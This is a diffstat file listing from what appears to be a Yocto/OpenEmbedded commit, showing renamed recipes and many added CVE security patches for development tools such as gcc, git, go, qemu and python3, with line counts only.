-rw-r--r--meta/recipes-devtools/gcc/gcc-9.5/0033-sync-gcc-stddef.h-with-musl.patch (renamed from meta/recipes-devtools/gcc/gcc-9.3/0033-sync-gcc-stddef.h-with-musl.patch)0
-rw-r--r--meta/recipes-devtools/gcc/gcc-9.5/0034-fix-segmentation-fault-in-precompiled-header-generat.patch (renamed from meta/recipes-devtools/gcc/gcc-9.3/0034-fix-segmentation-fault-in-precompiled-header-generat.patch)0
-rw-r--r--meta/recipes-devtools/gcc/gcc-9.5/0035-Fix-for-testsuite-failure.patch (renamed from meta/recipes-devtools/gcc/gcc-9.3/0035-Fix-for-testsuite-failure.patch)0
-rw-r--r--meta/recipes-devtools/gcc/gcc-9.5/0036-Re-introduce-spe-commandline-options.patch (renamed from meta/recipes-devtools/gcc/gcc-9.3/0036-Re-introduce-spe-commandline-options.patch)0
-rw-r--r--meta/recipes-devtools/gcc/gcc-9.5/0037-CVE-2019-14250-Check-zero-value-in-simple_object_elf.patch (renamed from meta/recipes-devtools/gcc/gcc-9.3/0037-CVE-2019-14250-Check-zero-value-in-simple_object_elf.patch)0
-rw-r--r--meta/recipes-devtools/gcc/gcc-9.5/0038-gentypes-genmodes-Do-not-use-__LINE__-for-maintainin.patch (renamed from meta/recipes-devtools/gcc/gcc-9.3/0038-gentypes-genmodes-Do-not-use-__LINE__-for-maintainin.patch)0
-rw-r--r--meta/recipes-devtools/gcc/gcc-9.5/0039-process_alt_operands-Don-t-match-user-defined-regs-o.patch (renamed from meta/recipes-devtools/gcc/gcc-9.3/0039-process_alt_operands-Don-t-match-user-defined-regs-o.patch)0
-rw-r--r--meta/recipes-devtools/gcc/gcc-9.5/CVE-2023-4039.patch1506
-rw-r--r--meta/recipes-devtools/gcc/gcc-common.inc3
-rw-r--r--meta/recipes-devtools/gcc/gcc-cross-canadian_9.5.bb (renamed from meta/recipes-devtools/gcc/gcc-cross-canadian_9.3.bb)0
-rw-r--r--meta/recipes-devtools/gcc/gcc-cross_9.5.bb (renamed from meta/recipes-devtools/gcc/gcc-cross_9.3.bb)0
-rw-r--r--meta/recipes-devtools/gcc/gcc-crosssdk_9.5.bb (renamed from meta/recipes-devtools/gcc/gcc-crosssdk_9.3.bb)0
-rw-r--r--meta/recipes-devtools/gcc/gcc-runtime_9.5.bb (renamed from meta/recipes-devtools/gcc/gcc-runtime_9.3.bb)0
-rw-r--r--meta/recipes-devtools/gcc/gcc-sanitizers_9.5.bb (renamed from meta/recipes-devtools/gcc/gcc-sanitizers_9.3.bb)0
-rw-r--r--meta/recipes-devtools/gcc/gcc-shared-source.inc3
-rw-r--r--meta/recipes-devtools/gcc/gcc-source.inc1
-rw-r--r--meta/recipes-devtools/gcc/gcc-source_9.5.bb (renamed from meta/recipes-devtools/gcc/gcc-source_9.3.bb)0
-rw-r--r--meta/recipes-devtools/gcc/gcc_9.5.bb (renamed from meta/recipes-devtools/gcc/gcc_9.3.bb)0
-rw-r--r--meta/recipes-devtools/gcc/libgcc-initial_9.5.bb (renamed from meta/recipes-devtools/gcc/libgcc-initial_9.3.bb)0
-rw-r--r--meta/recipes-devtools/gcc/libgcc_9.5.bb (renamed from meta/recipes-devtools/gcc/libgcc_9.3.bb)0
-rw-r--r--meta/recipes-devtools/gcc/libgfortran_9.5.bb (renamed from meta/recipes-devtools/gcc/libgfortran_9.3.bb)0
-rw-r--r--meta/recipes-devtools/gdb/gdb-9.1.inc1
-rw-r--r--meta/recipes-devtools/gdb/gdb-common.inc1
-rw-r--r--meta/recipes-devtools/gdb/gdb/0012-CVE-2023-39128.patch75
-rw-r--r--meta/recipes-devtools/git/files/CVE-2021-40330.patch108
-rw-r--r--meta/recipes-devtools/git/files/CVE-2022-23521.patch367
-rw-r--r--meta/recipes-devtools/git/files/CVE-2022-41903-01.patch39
-rw-r--r--meta/recipes-devtools/git/files/CVE-2022-41903-02.patch187
-rw-r--r--meta/recipes-devtools/git/files/CVE-2022-41903-03.patch146
-rw-r--r--meta/recipes-devtools/git/files/CVE-2022-41903-04.patch150
-rw-r--r--meta/recipes-devtools/git/files/CVE-2022-41903-05.patch98
-rw-r--r--meta/recipes-devtools/git/files/CVE-2022-41903-06.patch90
-rw-r--r--meta/recipes-devtools/git/files/CVE-2022-41903-07.patch123
-rw-r--r--meta/recipes-devtools/git/files/CVE-2022-41903-08.patch67
-rw-r--r--meta/recipes-devtools/git/files/CVE-2022-41903-09.patch162
-rw-r--r--meta/recipes-devtools/git/files/CVE-2022-41903-10.patch99
-rw-r--r--meta/recipes-devtools/git/files/CVE-2022-41903-11.patch90
-rw-r--r--meta/recipes-devtools/git/files/CVE-2022-41903-12.patch124
-rw-r--r--meta/recipes-devtools/git/files/CVE-2023-22490-1.patch179
-rw-r--r--meta/recipes-devtools/git/files/CVE-2023-22490-2.patch122
-rw-r--r--meta/recipes-devtools/git/files/CVE-2023-22490-3.patch154
-rw-r--r--meta/recipes-devtools/git/files/CVE-2023-23946.patch184
-rw-r--r--meta/recipes-devtools/git/files/CVE-2023-25652.patch94
-rw-r--r--meta/recipes-devtools/git/files/CVE-2023-29007.patch159
-rw-r--r--meta/recipes-devtools/git/git.inc35
-rw-r--r--meta/recipes-devtools/git/git/fixsort.patch36
-rw-r--r--meta/recipes-devtools/git/git_2.24.4.bb (renamed from meta/recipes-devtools/git/git_2.24.3.bb)4
-rw-r--r--meta/recipes-devtools/glide/glide_0.13.3.bb5
-rw-r--r--meta/recipes-devtools/gnu-config/gnu-config_git.bb3
-rw-r--r--meta/recipes-devtools/go/go-1.14.inc110
-rw-r--r--meta/recipes-devtools/go/go-1.14/0001-CVE-2022-32190.patch74
-rw-r--r--meta/recipes-devtools/go/go-1.14/0002-CVE-2022-32190.patch48
-rw-r--r--meta/recipes-devtools/go/go-1.14/0003-CVE-2022-32190.patch36
-rw-r--r--meta/recipes-devtools/go/go-1.14/0004-CVE-2022-32190.patch82
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2020-29510.patch65
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2021-27918.patch191
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2021-31525.patch38
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2021-33195.patch373
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2021-33196.patch124
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2021-33197.patch152
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2021-33198.patch113
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2021-34558.patch51
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2021-36221.patch101
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2021-38297.patch97
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2021-39293.patch79
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2021-41771.patch86
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2021-44716.patch93
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2021-44717.patch83
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2022-1962.patch357
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2022-23772.patch50
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2022-23806.patch142
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2022-24675.patch271
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2022-24921.patch198
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2022-27664.patch68
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2022-28131.patch104
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2022-28327.patch36
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2022-2879.patch111
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2022-2880.patch164
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2022-30629.patch47
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2022-30631.patch116
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2022-30632.patch71
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2022-30633.patch131
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2022-30635.patch120
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2022-32148.patch49
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2022-32189.patch113
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2022-41715.patch271
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2022-41717.patch75
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2022-41722-1.patch53
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2022-41722-2.patch104
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2022-41723.patch156
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2022-41725-pre1.patch85
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2022-41725-pre2.patch97
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2022-41725-pre3.patch98
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2022-41725.patch660
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2023-24534.patch200
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2023-24536_1.patch134
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2023-24536_2.patch184
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2023-24536_3.patch349
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2023-24537.patch76
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2023-24538-1.patch125
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2023-24538-2.patch635
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2023-24538_3.patch393
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2023-24538_4.patch497
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2023-24538_5.patch585
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2023-24538_6.patch371
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2023-24539.patch60
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2023-24540.patch90
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2023-29400.patch94
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2023-29402.patch201
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2023-29404.patch84
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2023-29405-1.patch112
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2023-29405-2.patch38
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2023-29406-1.patch212
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2023-29406-2.patch114
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2023-29409.patch175
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2023-39318.patch262
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2023-39319.patch230
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2023-39326.patch181
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2023-45287-pre1.patch393
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2023-45287-pre2.patch401
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2023-45287-pre3.patch86
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2023-45287.patch1697
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2023-45289.patch121
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2023-45290.patch271
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2024-24784.patch205
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2024-24785.patch197
-rw-r--r--meta/recipes-devtools/go/go-crosssdk.inc2
-rw-r--r--meta/recipes-devtools/go/go-dep_0.5.4.bb2
-rw-r--r--meta/recipes-devtools/go/go_1.14.bb10
-rw-r--r--meta/recipes-devtools/help2man/help2man-native_1.47.11.bb3
-rw-r--r--meta/recipes-devtools/i2c-tools/i2c-tools_4.1.bb1
-rw-r--r--meta/recipes-devtools/icecc-toolchain/nativesdk-icecc-toolchain_0.1.bb1
-rw-r--r--meta/recipes-devtools/intltool/intltool_0.51.0.bb2
-rw-r--r--meta/recipes-devtools/jquery/jquery_3.5.0.bb6
-rw-r--r--meta/recipes-devtools/libcomps/libcomps_0.1.15.bb4
-rw-r--r--meta/recipes-devtools/libdnf/libdnf/0040-Mark-job-goal.upgrade-with-sltr-as-target.patch58
-rw-r--r--meta/recipes-devtools/libdnf/libdnf_0.28.1.bb5
-rw-r--r--meta/recipes-devtools/libmodulemd/libmodulemd-v1_git.bb2
-rw-r--r--meta/recipes-devtools/librepo/librepo/CVE-2020-14352.patch55
-rw-r--r--meta/recipes-devtools/librepo/librepo_1.11.2.bb5
-rw-r--r--meta/recipes-devtools/libtool/libtool-2.4.6.inc4
-rw-r--r--meta/recipes-devtools/libtool/libtool/0001-Makefile.am-make-sure-autoheader-run-before-autoconf.patch35
-rw-r--r--meta/recipes-devtools/libtool/libtool/0001-Makefile.am-make-sure-autoheader-run-before-automake.patch35
-rw-r--r--meta/recipes-devtools/libtool/libtool/lto-prefix.patch22
-rw-r--r--meta/recipes-devtools/libtool/libtool_2.4.6.bb2
-rw-r--r--meta/recipes-devtools/llvm/llvm/0001-AsmMatcherEmitter-sort-ClassInfo-lists-by-name-as-we.patch31
-rw-r--r--meta/recipes-devtools/llvm/llvm_git.bb10
-rw-r--r--meta/recipes-devtools/m4/m4-1.4.18.inc1
-rw-r--r--meta/recipes-devtools/m4/m4/0001-c-stack-stop-using-SIGSTKSZ.patch84
-rw-r--r--meta/recipes-devtools/makedevs/makedevs_1.0.1.bb1
-rw-r--r--meta/recipes-devtools/mklibs/files/remove-deprecated-exception-specification-cpp17.patch431
-rw-r--r--meta/recipes-devtools/mklibs/mklibs-native_0.1.44.bb1
-rw-r--r--meta/recipes-devtools/mmc/mmc-utils_git.bb1
-rw-r--r--meta/recipes-devtools/mtd/mtd-utils/0001-mtd-utils-Fix-return-value-of-ubiformat.patch62
-rw-r--r--meta/recipes-devtools/mtd/mtd-utils_git.bb14
-rw-r--r--meta/recipes-devtools/nasm/nasm/0002-Add-debug-prefix-map-option.patch42
-rw-r--r--meta/recipes-devtools/nasm/nasm/CVE-2022-44370.patch104
-rw-r--r--meta/recipes-devtools/nasm/nasm_2.15.05.bb (renamed from meta/recipes-devtools/nasm/nasm_2.15.03.bb)7
-rw-r--r--meta/recipes-devtools/ninja/ninja_1.10.0.bb6
-rw-r--r--meta/recipes-devtools/opkg/opkg/0001-file_util.c-fix-possible-bad-memory-access-in-file_r.patch50
-rw-r--r--meta/recipes-devtools/opkg/opkg/sourcedateepoch.patch24
-rw-r--r--meta/recipes-devtools/opkg/opkg_0.4.2.bb7
-rw-r--r--meta/recipes-devtools/orc/orc_0.4.31.bb1
-rw-r--r--meta/recipes-devtools/patch/patch/CVE-2019-20633.patch31
-rw-r--r--meta/recipes-devtools/patch/patch_2.7.6.bb1
-rw-r--r--meta/recipes-devtools/patchelf/patchelf_0.10.bb11
-rw-r--r--meta/recipes-devtools/perl/files/CVE-2023-31484.patch27
-rw-r--r--meta/recipes-devtools/perl/files/CVE-2023-47038.patch121
-rw-r--r--meta/recipes-devtools/perl/libmodule-build-perl_0.4231.bb1
-rw-r--r--meta/recipes-devtools/perl/libxml-parser-perl_2.46.bb1
-rw-r--r--meta/recipes-devtools/perl/perl_5.30.1.bb12
-rw-r--r--meta/recipes-devtools/pkgconfig/pkgconfig_git.bb2
-rw-r--r--meta/recipes-devtools/pseudo/files/0001-Add-statx.patch106
-rw-r--r--meta/recipes-devtools/pseudo/files/0001-maketables-wrappers-use-Python-3.patch34
-rw-r--r--meta/recipes-devtools/pseudo/files/0001-pseudo-On-a-DB-fixup-remove-files-that-do-not-exist-.patch49
-rw-r--r--meta/recipes-devtools/pseudo/files/0001-pseudo_ipc.h-Fix-enum-typedef.patch31
-rw-r--r--meta/recipes-devtools/pseudo/files/0001-realpath.c-Remove-trailing-slashes.patch57
-rw-r--r--meta/recipes-devtools/pseudo/files/0006-xattr-adjust-for-attr-2.4.48-release.patch48
-rwxr-xr-xmeta/recipes-devtools/pseudo/files/build-oldlibc20
-rw-r--r--meta/recipes-devtools/pseudo/files/moreretries.patch19
-rw-r--r--meta/recipes-devtools/pseudo/files/older-glibc-symbols.patch57
-rw-r--r--meta/recipes-devtools/pseudo/files/seccomp.patch137
-rw-r--r--meta/recipes-devtools/pseudo/files/toomanyfiles.patch71
-rw-r--r--meta/recipes-devtools/pseudo/files/xattr_version.patch54
-rw-r--r--meta/recipes-devtools/pseudo/pseudo.inc14
-rw-r--r--meta/recipes-devtools/pseudo/pseudo_git.bb21
-rw-r--r--meta/recipes-devtools/python-numpy/python-numpy.inc2
-rw-r--r--meta/recipes-devtools/python/files/0001-bpo-39503-CVE-2020-8492-Fix-AbstractBasicAuthHandler.patch248
-rw-r--r--meta/recipes-devtools/python/python-setuptools.inc2
-rw-r--r--meta/recipes-devtools/python/python3-jinja2_2.11.3.bb (renamed from meta/recipes-devtools/python/python3-jinja2_2.11.2.bb)5
-rw-r--r--meta/recipes-devtools/python/python3-magic_0.4.15.bb7
-rw-r--r--meta/recipes-devtools/python/python3-pip/CVE-2021-3572.patch48
-rw-r--r--meta/recipes-devtools/python/python3-pip_20.0.2.bb1
-rw-r--r--meta/recipes-devtools/python/python3-pycairo_1.19.0.bb2
-rw-r--r--meta/recipes-devtools/python/python3-pygobject_3.34.0.bb2
-rw-r--r--meta/recipes-devtools/python/python3-scons_3.1.2.bb1
-rw-r--r--meta/recipes-devtools/python/python3-setuptools/CVE-2022-40897.patch29
-rw-r--r--meta/recipes-devtools/python/python3/0001-bpo-36852-proper-detection-of-mips-architecture-for-.patch42
-rw-r--r--meta/recipes-devtools/python/python3/0001-test_ctypes.test_find-skip-without-tools-sdk.patch33
-rw-r--r--meta/recipes-devtools/python/python3/0001-test_locale.py-correct-the-test-output-format.patch24
-rw-r--r--meta/recipes-devtools/python/python3/CVE-2020-14422.patch77
-rw-r--r--meta/recipes-devtools/python/python3/CVE-2020-26116.patch104
-rw-r--r--meta/recipes-devtools/python/python3/CVE-2020-27619.patch70
-rw-r--r--meta/recipes-devtools/python/python3/CVE-2023-24329.patch80
-rw-r--r--meta/recipes-devtools/python/python3/makerace.patch23
-rw-r--r--meta/recipes-devtools/python/python3/python3-manifest.json4
-rw-r--r--meta/recipes-devtools/python/python3_3.8.18.bb (renamed from meta/recipes-devtools/python/python3_3.8.2.bb)40
-rw-r--r--meta/recipes-devtools/qemu/qemu-system-native_4.2.0.bb2
-rw-r--r--meta/recipes-devtools/qemu/qemu.inc163
-rw-r--r--meta/recipes-devtools/qemu/qemu/0012-fix-libcap-header-issue-on-some-distro.patch9
-rw-r--r--meta/recipes-devtools/qemu/qemu/0012-util-cacheinfo-fix-crash-when-compiling-with-uClibc.patch48
-rw-r--r--meta/recipes-devtools/qemu/qemu/9pfs-local-ignore-O_NOATIME-if-we-don-t-have-permiss.patch63
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2020-12829_1.patch164
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2020-12829_2.patch139
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2020-12829_3.patch47
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2020-12829_4.patch100
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2020-12829_5.patch266
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2020-13253_1.patch50
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2020-13253_2.patch112
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2020-13253_3.patch86
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2020-13253_4.patch139
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2020-13253_5.patch54
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2020-13754-1.patch91
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2020-13754-2.patch69
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2020-13754-3.patch65
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2020-13754-4.patch39
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2020-13791.patch44
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2020-15469-1.patch50
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2020-15469-2.patch69
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2020-15469-3.patch49
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2020-15469-4.patch53
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2020-15469-5.patch53
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2020-15469-6.patch61
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2020-15469-7.patch50
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2020-15469-8.patch44
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2020-15859.patch39
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2020-24165.patch94
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2020-25085.patch46
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2020-25624_1.patch87
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2020-25624_2.patch101
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2020-25625.patch42
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2020-25723.patch52
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2020-27617.patch49
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2020-27821.patch73
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2020-28916.patch48
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2020-29443.patch45
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2020-35504.patch51
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2020-35505.patch45
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2021-20181.patch81
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2021-20196.patch62
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2021-20203.patch74
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2021-20221.patch67
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2021-20257.patch55
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2021-3392.patch92
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2021-3409-1.patch85
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2021-3409-2.patch103
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2021-3409-3.patch71
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2021-3409-4.patch52
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2021-3409-5.patch93
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2021-3416_1.patch177
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2021-3416_10.patch41
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2021-3416_2.patch42
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2021-3416_3.patch43
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2021-3416_5.patch42
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2021-3416_6.patch40
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2021-3416_7.patch42
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2021-3416_8.patch44
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2021-3416_9.patch41
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2021-3507.patch87
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2021-3527-1.patch42
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2021-3527-2.patch59
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2021-3544.patch29
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2021-3544_2.patch39
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2021-3544_3.patch39
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2021-3544_4.patch46
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2021-3544_5.patch47
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2021-3545.patch41
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2021-3546.patch47
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2021-3582.patch47
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2021-3607.patch43
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2021-3608.patch40
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2021-3638.patch80
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2021-3682.patch41
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2021-3713.patch67
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2021-3748.patch124
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2021-3750.patch180
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2021-3929.patch81
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2021-3930.patch53
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2021-4206.patch89
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2021-4207.patch43
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2022-0216-1.patch42
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2022-0216-2.patch52
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2022-26354.patch57
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2022-35414.patch53
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2022-4144.patch103
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2023-0330.patch77
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2023-2861.patch178
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2023-3180.patch49
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2023-3354.patch87
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2023-5088.patch114
-rw-r--r--meta/recipes-devtools/qemu/qemu/hw-block-nvme-handle-dma-errors.patch146
-rw-r--r--meta/recipes-devtools/qemu/qemu/hw-block-nvme-refactor-nvme_addr_read.patch55
-rw-r--r--meta/recipes-devtools/qemu/qemu/hw-display-qxl-Pass-requested-buffer-size-to-qxl_phy.patch236
-rw-r--r--meta/recipes-devtools/qemu/qemu_4.2.0.bb5
-rw-r--r--meta/recipes-devtools/quilt/quilt.inc3
-rw-r--r--meta/recipes-devtools/quilt/quilt/faildiff-order.patch41
-rw-r--r--meta/recipes-devtools/rpm/files/0001-rpm-rpmio.c-restrict-virtual-memory-usage-if-limit-s.patch25
-rw-r--r--meta/recipes-devtools/rpm/files/0001-rpmio-Fix-lzopen_internal-mode-parsing-when-Tn-is-us.patch34
-rw-r--r--meta/recipes-devtools/rpm/files/CVE-2021-20266.patch109
-rw-r--r--meta/recipes-devtools/rpm/files/CVE-2021-3421.patch197
-rw-r--r--meta/recipes-devtools/rpm/files/CVE-2021-3521-01.patch60
-rw-r--r--meta/recipes-devtools/rpm/files/CVE-2021-3521-02.patch55
-rw-r--r--meta/recipes-devtools/rpm/files/CVE-2021-3521-03.patch34
-rw-r--r--meta/recipes-devtools/rpm/files/CVE-2021-3521.patch330
-rw-r--r--meta/recipes-devtools/rpm/rpm_4.14.2.1.bb12
-rw-r--r--meta/recipes-devtools/rsync/files/0001-Fix-relative-when-copying-an-absolute-path.patch31
-rw-r--r--meta/recipes-devtools/rsync/files/CVE-2022-29154.patch334
-rw-r--r--meta/recipes-devtools/rsync/rsync_3.1.3.bb3
-rw-r--r--meta/recipes-devtools/ruby/ruby.inc4
-rw-r--r--meta/recipes-devtools/ruby/ruby/0001-template-Makefile.in-do-not-write-host-cross-cc-item.patch32
-rw-r--r--meta/recipes-devtools/ruby/ruby/CVE-2020-25613.patch40
-rw-r--r--meta/recipes-devtools/ruby/ruby/CVE-2021-33621.patch139
-rw-r--r--meta/recipes-devtools/ruby/ruby/CVE-2023-28756.patch61
-rw-r--r--meta/recipes-devtools/ruby/ruby_2.7.6.bb (renamed from meta/recipes-devtools/ruby/ruby_2.7.1.bb)12
-rwxr-xr-xmeta/recipes-devtools/run-postinsts/run-postinsts/run-postinsts10
-rw-r--r--meta/recipes-devtools/run-postinsts/run-postinsts/run-postinsts.service2
-rw-r--r--meta/recipes-devtools/run-postinsts/run-postinsts_1.0.bb1
-rw-r--r--meta/recipes-devtools/squashfs-tools/files/CVE-2021-40153.patch253
-rw-r--r--meta/recipes-devtools/squashfs-tools/squashfs-tools_git.bb5
-rwxr-xr-xmeta/recipes-devtools/strace/strace/run-ptest2
-rw-r--r--meta/recipes-devtools/strace/strace_5.5.bb1
-rw-r--r--meta/recipes-devtools/subversion/subversion/CVE-2020-17525.patch117
-rw-r--r--meta/recipes-devtools/subversion/subversion/CVE-2021-28544.patch146
-rw-r--r--meta/recipes-devtools/subversion/subversion_1.13.0.bb3
-rw-r--r--meta/recipes-devtools/swig/swig/determinism.patch19
-rw-r--r--meta/recipes-devtools/swig/swig_3.0.12.bb1
-rw-r--r--meta/recipes-devtools/syslinux/syslinux/determinism.patch22
